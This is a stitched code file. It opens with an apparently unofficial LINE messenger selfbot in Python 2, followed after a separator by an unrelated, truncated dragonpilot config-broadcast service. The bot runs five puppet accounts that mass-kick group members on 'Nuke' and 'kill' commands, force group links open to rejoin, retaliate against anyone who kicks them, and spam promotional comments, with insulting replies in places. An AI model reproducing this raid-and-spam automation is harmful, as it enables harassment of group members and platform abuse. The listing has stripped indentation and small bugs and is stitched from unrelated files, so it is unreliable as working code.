# if msg.from_ in admin:
# wait["dblacklist"] = True
# cl.sendText(msg.to,"send contact to ban")
# elif msg.text in ["Banlist","เชคดำ"]:
# if msg.from_ in admin:
# if wait["blacklist"] == {}:
# cl.sendText(msg.to,"Nothing double thumbs up")
# else:
# cl.sendText(msg.to,"Daftar Banlist")
# mc = "[⎈]Blacklist [⎈]\n"
# for mi_d in wait["blacklist"]:
# mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
# cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki2.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki,ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Hahaha")
ki2.sendText(msg,to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
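# "Kicker": temporarily opens the group's join link so every bot account can
# join via a reissued ticket, then closes the link again.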
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc on","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = True
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif msg.text in ["Welcome","wc off","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = False
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
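# op.type 19 (member kicked): if one of our accounts was kicked, another
# account kicks the attacker back, reopens the group link, rejoins all
# accounts via ticket and (in some branches) blacklists the attacker.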
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
        if op.type == 17:
            if op.param2 not in Bots:
                if wait["protect"] == True:
                    if wait["blacklist"].get(op.param2) == True:
                        try:
                            random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                            G = random.choice(KAC).getGroup(op.param1)
                            G.preventJoinByTicket = True
                            random.choice(KAC).updateGroup(G)
                        except:
                            try:
                                random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                                G = random.choice(KAC).getGroup(op.param1)
                                G.preventJoinByTicket = True
                                random.choice(KAC).updateGroup(G)
                            except:
                                pass
                    elif op.param2 not in admin + Bots:
                        random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
                    else:
                        pass
        if op.type == 19:
            if op.param2 not in Bots:
                if wait["protect"] == True:
                    wait["blacklist"][op.param2] = True
                    random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                else:
                    cl.sendText(op.param1,"")
            else:
                cl.sendText(op.param1,"")
        if op.type == 13:
            if op.param2 not in Bots:
                if wait["inviteprotect"] == True:
                    wait["blacklist"][op.param2] = True
                    random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                else:
                    cl.sendText(op.param1,"")
            else:
                cl.sendText(op.param1,"")
            if op.param2 not in Bots:
                if wait["inviteprotect"] == True:
                    wait["blacklist"][op.param2] = True
                    cl.cancelGroupInvitation(op.param1,[op.param3])
                else:
                    cl.sendText(op.param1,"")
            else:
                cl.sendText(op.param1,"")
            if op.param2 not in Bots:
                if wait["cancelprotect"] == True:
                    wait["blacklist"][op.param2] = True
                    cl.cancelGroupInvitation(op.param1,[op.param3])
                else:
                    cl.sendText(op.param1,"")
            else:
                cl.sendText(op.param1,"")
        if op.type == 11:
            if op.param2 not in Bots:
                if wait["linkprotect"] == True:
                    wait["blacklist"][op.param2] = True
                    G = ki.getGroup(op.param1)
                    G.preventJoinByTicket = True
                    ki.updateGroup(G)
                    random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                else:
                    cl.sendText(op.param1,"")
            else:
                cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
                        wait2['setTime'][op.param1] = datetime.strftime(now2,"%H:%M")
                else:
                    pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait['likeOn'] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
def a2():
    now2 = datetime.now()
    nowT = datetime.strftime(now2,"%M")
    # %M yields a two-character minute string ("00".."59")
    if nowT in ["10","20","30","40","50","00"]:
        return False
    else:
        return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
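# A minimal sketch of the long-poll dispatch pattern used above, assuming a
# client object exposing the same fetchOps/Poll.rev interface as `cl`
# (hypothetical helper name, not part of the original script). The key idea:
# advance the stored revision to the highest one seen so operations are not
# fetched twice, and skip END_OF_OPERATION markers.
#
# def poll_forever(client, handler, count=5):
#     while True:
#         try:
#             ops = client.fetchOps(client.Poll.rev, count)
#         except EOFError:
#             raise Exception("It might be wrong revision\n" + str(client.Poll.rev))
#         for op in ops:
#             if op.type != OpType.END_OF_OPERATION:
#                 client.Poll.rev = max(client.Poll.rev, op.revision)
#                 handler(op)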
|
systemd.py
|
#!/usr/bin/env python3
# The MIT License
#
# Copyright (c) 2019-, Rick Lan, dragonpilot community, and a number of other of contributors.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
This is a service that broadcast dp config values to openpilot's messaging queues
'''
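# A minimal sketch of the pattern this service implements, using only the
# cereal.messaging calls that appear in confd_thread below (illustrative
# fragment, not executed here):
#
# sm = messaging.SubMaster(['deviceState'])   # inputs we react to
# pm = messaging.PubMaster(['dragonConf'])    # output socket
# msg = messaging.new_message('dragonConf')   # fresh capnp event
# sm.update(0)                                # non-blocking poll of inputs
# pm.send('dragonConf', msg)                  # broadcast to all subscribers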
import cereal.messaging as messaging
from common.dp_conf import confs, get_struct_name, to_struct_val
from common.params import Params, put_nonblocking
import os
from selfdrive.hardware import HARDWARE
params = Params()
from common.dp_common import param_get, get_last_modified
from common.dp_time import LAST_MODIFIED_SYSTEMD
from selfdrive.dragonpilot.dashcamd import Dashcamd
from selfdrive.hardware import EON
import socket
from common.realtime import Ratekeeper
import threading
from selfdrive.dragonpilot.gpx_uploader import gpx_uploader_thread
PARAM_PATH = params.get_params_path() + '/d/'
HERTZ = 1
last_modified_confs = {}
def confd_thread():
sm = messaging.SubMaster(['deviceState'])
pm = messaging.PubMaster(['dragonConf'])
last_dp_msg = None
frame = 0
update_params = False
modified = None
last_modified = None
last_modified_check = None
started = False
free_space = 1
last_started = False
dashcamd = Dashcamd()
is_eon = EON
  rk = Ratekeeper(HERTZ, print_delay_threshold=None)  # keep loop rate at HERTZ (1 Hz)
uploader_thread = None
while True:
if uploader_thread is None:
uploader_thread = threading.Thread(target=gpx_uploader_thread)
uploader_thread.start()
msg = messaging.new_message('dragonConf')
if last_dp_msg is not None:
msg.dragonConf = last_dp_msg
'''
===================================================
load thermalState data every 3 seconds
===================================================
'''
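    # Worked example of the frame-modulo scheduling used throughout this loop:
    # with HERTZ = 1 the loop runs once per second, so frame % (HERTZ * 3) == 0
    # holds on frames 0, 3, 6, ... i.e. every 3 seconds; the same arithmetic
    # drives the 10-second and 30-second blocks below.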
if frame % (HERTZ * 3) == 0:
sm.update(0)
if sm.updated['deviceState']:
started = sm['deviceState'].started
free_space = sm['deviceState'].freeSpacePercent
'''
===================================================
hotspot on boot
we do it after 30 secs just in case
===================================================
'''
if is_eon and frame == (HERTZ * 30) and param_get("dp_hotspot_on_boot", "bool", False):
os.system("service call wifi 37 i32 0 i32 1 &")
'''
===================================================
check dp_last_modified every second
===================================================
'''
if not update_params:
last_modified_check, modified = get_last_modified(LAST_MODIFIED_SYSTEMD, last_modified_check, modified)
if last_modified != modified:
update_params = True
last_modified = modified
'''
===================================================
conditionally set update_params to true
===================================================
'''
# force updating param when `started` changed
if last_started != started:
update_params = True
if frame == 0:
update_params = True
'''
===================================================
push param vals to message
===================================================
'''
if update_params:
msg = update_conf_all(confs, msg, frame == 0)
update_params = False
'''
===================================================
push once
===================================================
'''
if frame == 0:
setattr(msg.dragonConf, get_struct_name('dp_locale'), params.get("dp_locale"))
      # mirror EndToEndToggle into dp_lane_less_mode_ctrl on first run
      put_nonblocking('dp_lane_less_mode_ctrl', "1" if params.get_bool('EndToEndToggle') else "0")
'''
===================================================
push ip addr every 10 secs
===================================================
'''
if frame % (HERTZ * 10) == 0:
msg = update_ip(msg)
'''
===================================================
update msg based on some custom logic
===================================================
'''
msg = update_custom_logic(msg)
    '''
    ===================================================
    battery ctrl every 30 secs
    PowerMonitor in thermald turns charging back on
    every minute, so turn it off more frequently
    ===================================================
    '''
# if frame % (HERTZ * 30) == 0:
# last_charging_ctrl = process_charging_ctrl(msg, last_charging_ctrl, battery_percent)
'''
===================================================
dashcam
===================================================
'''
if msg.dragonConf.dpDashcamd and frame % HERTZ == 0:
dashcamd.run(started, free_space)
'''
===================================================
finalise
===================================================
'''
last_dp_msg = msg.dragonConf
last_started = started
pm.send('dragonConf', msg)
frame += 1
rk.keep_time()
def update_conf(msg, conf, first_run=False):
  conf_type = conf.get('conf_type')
  access_time = None
